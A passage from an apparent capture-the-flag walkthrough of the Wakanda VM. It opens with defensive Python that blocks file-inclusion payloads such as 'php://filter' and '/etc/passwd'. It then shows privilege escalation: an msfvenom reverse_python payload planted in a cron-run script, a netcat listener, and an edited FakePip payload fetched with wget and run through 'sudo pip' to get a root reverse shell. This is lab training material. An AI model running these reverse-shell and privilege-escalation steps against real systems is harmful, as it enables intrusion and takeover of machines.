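Both LFI bugs above come from the same mistake: the files_api.php endpoint in the previous write-up opened whatever `file=` named, and Wakanda's index page included whatever `lang=` named, so `/etc/passwd` and a `php://filter` wrapper were accepted. The following Python is an added example (not code from either VM) of the server-side checks that close both: a fixed map for the language switch, and a realpath-confined lookup for a file parameter. The directory layout and file names it builds are constructed for the demonstration.

```python
"""Confine a user-controlled file name to one directory (added example).

Models the two bugs in the write-ups above: files_api.php took
`file=/etc/passwd`, and Wakanda's index took
`lang=php://filter/convert.base64-encode/resource=index`.
"""
import os
import tempfile


class UnsafePathError(ValueError):
    """Raised when a requested name must not be opened."""


# Language switch: never build a file name from user input; map it instead.
LANGUAGE_FILES = {"en": "index_en.php", "fr": "index_fr.php"}  # constructed names


def language_file(lang, default="en"):
    """Return the include file for `lang`; unknown values fall back to the default."""
    return LANGUAGE_FILES.get(lang, LANGUAGE_FILES[default])


def resolve_local_file(base_dir, requested, allowed_suffixes=(".txt", ".json")):
    """Resolve `requested` strictly inside base_dir or raise UnsafePathError."""
    if not requested or "\x00" in requested:
        raise UnsafePathError("empty name or NUL byte")
    # Stream wrappers and URL schemes (php://, data:, phar://, http://) are never files here.
    head = requested.split("/", 1)[0]
    if "://" in requested or ":" in head:
        raise UnsafePathError("wrapper or scheme is not allowed: %r" % requested)
    if os.path.isabs(requested):
        raise UnsafePathError("absolute paths are not allowed")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # realpath collapses ../ and follows symlinks, so this catches traversal and symlink escapes.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePathError("path escapes the base directory")
    if allowed_suffixes and not candidate.lower().endswith(allowed_suffixes):
        raise UnsafePathError("file type not allowed")
    if not os.path.isfile(candidate):
        raise UnsafePathError("no such file")
    return candidate


def make_demo_dir():
    """Build a constructed document root: one allowed file, one secret outside, one symlink."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    files_dir = os.path.join(root, "files")
    os.mkdir(files_dir)
    with open(os.path.join(files_dir, "report.txt"), "w") as fh:
        fh.write("quarterly report\n")
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("not for the API\n")
    os.symlink(os.path.join(root, "secret.txt"), os.path.join(files_dir, "link.txt"))
    return files_dir


def check(base_dir, requested):
    """Return 'allowed' or 'blocked: <reason>' for a requested name."""
    try:
        resolve_local_file(base_dir, requested)
        return "allowed"
    except UnsafePathError as exc:
        return "blocked: " + str(exc)


if __name__ == "__main__":
    base = make_demo_dir()
    for name in ("report.txt", "/etc/passwd", "../secret.txt", "link.txt",
                 "php://filter/convert.base64-encode/resource=index"):
        print("%-50s %s" % (name, check(base, name)))
    print("lang=fr ->", language_file("fr"))
    print("lang=php://filter/... ->", language_file("php://filter/convert.base64-encode/resource=index"))
```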
When we log in through ssh we get a Python interpreter prompt. We import the pty module and spawn a /bin/bash shell. We take a look at the home directory of user mamadou and find the first flag.
```
ssh mamadou@192.168.1.124 -p 3333
```
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-qBtPrm97Um4/W27JxxsJMgI/AAAAAAAAZrY/O0CV3r6zEJIQs36UHrNGOuQ62v0cYZl6QCEwYBhgL/s1600/10.png?w=687&ssl=1)
Enumerating the directories, in /tmp we find a file called test. We open it and find nothing interesting, but on closer inspection we see that it is owned by the user devops. Now we find all files owned by devops and find a file called ".antivirus.py" inside the /srv directory.
```
find / -user devops 2>/dev/null
```
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-ar89CTFfvH4/W27Jxm0dPGI/AAAAAAAAZrA/OxyU21oMFfM8fHXn1JHoPL7-HMoUGI7TwCEwYBhgL/s1600/11.png?w=687&ssl=1)
When we open the Python file we find that it opens the test file and writes "test" into it. To exploit this, we replace the code with our own payload. First, we create a msfvenom payload.
```
msfvenom -p cmd/unix/reverse_python lhost=192.168.1.134 lport=4444 R
```
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-T_Hgl29-kyU/W27JylqbqzI/AAAAAAAAZrY/FrdaxLB9FUYzot4G8UPsFJbGUopUD9nmgCEwYBhgL/s1600/12.png?w=687&ssl=1)
After creating the payload, we open the .antivirus.py file, comment out the earlier code, and insert our payload without the leading "python -c".
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-oW4yndSZatQ/W27Jy93Nx9I/AAAAAAAAZrM/XA--GArQ3dkQPJdZlVHpOxhGuOhiJiUhwCEwYBhgL/s1600/13.png?w=687&ssl=1)
We set up a netcat listener and wait a few minutes for the script to be executed. As soon as the script runs we get a reverse shell. When we check the UID we find that we have a shell as devops. Now we go to the /home/devops directory and find the second flag. After getting the second flag, we find that we can run pip as a superuser via sudo.
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-pv7UULRuz50/W27JzEXqOpI/AAAAAAAAZrU/FLXek_2gkfc2MeRivQOPCT6tTR7r7S_BgCEwYBhgL/s1600/14.png?w=687&ssl=1)
Now there is a script called FakePip that can be used to exploit this.
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-oyTBd0ZX9oQ/W27Jzt87N4I/AAAAAAAAZrM/KSta4pWP0lMldx_BQ1k4XwHW1arVeF51QCEwYBhgL/s1600/15.png?w=687&ssl=1)
We download the fakepip script into our system to edit the payload inside.
```
git clone <FakePip repository URL>
```
We edit the payload inside the os.system function.
![[Image: 17.1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-flmanQMs9uY/W27J071ETpI/AAAAAAAAZrA/wb0xU-jeYMsv19tTOhB_JXKWE5jqM2mygCEwYBhgL/s1600/17.1.png?w=687&ssl=1)
We decode the base64 encoded string and change the IP address to our IP address. Then we again convert the string to base64 and replace the older string with the new one.
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-ctLs6VgSLFo/W27J1JnPcYI/AAAAAAAAZrU/GA6-7hfDKJIb_wleTksVddCQ6TpPWmKpwCEwYBhgL/s1600/17.png?w=687&ssl=1)
We start the python server on our system so that we can upload the FakePip script into the target machine.
```
python -m SimpleHTTPServer 80
```
![[Image: 16.1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-05Wj8Zxg-wY/W27Jz7Eu0eI/AAAAAAAAZrY/TnwCOtVDbU8ElQfcVIp07ItxGTXVilrKgCEwYBhgL/s1600/16.1.png?w=687&ssl=1)
After starting the HTTP server, we download the script to the target machine using wget. Then we execute the command as per the instructions in the FakePip readme file.
```
wget http://<attacker IP>/<FakePip files>
sudo pip install . --upgrade --force-reinstall
```
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-GnS4AliNaow/W27J1fW24_I/AAAAAAAAZrY/7X6zL6IA9hkQm3eSik3iWwp1L5jVBh72ACEwYBhgL/s1600/18.png?w=687&ssl=1)
As soon as we run the command we get a reverse shell as the root user. We now go to the root directory and find the root flag.
![[Image: 25.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-Jf3Q-59QrmQ/W27J2WncMHI/AAAAAAAAZrE/1G6BZ4jwVoQDfIxDG6qmocaDmFUcxyUJgCEwYBhgL/s1600/25.png?w=687&ssl=1)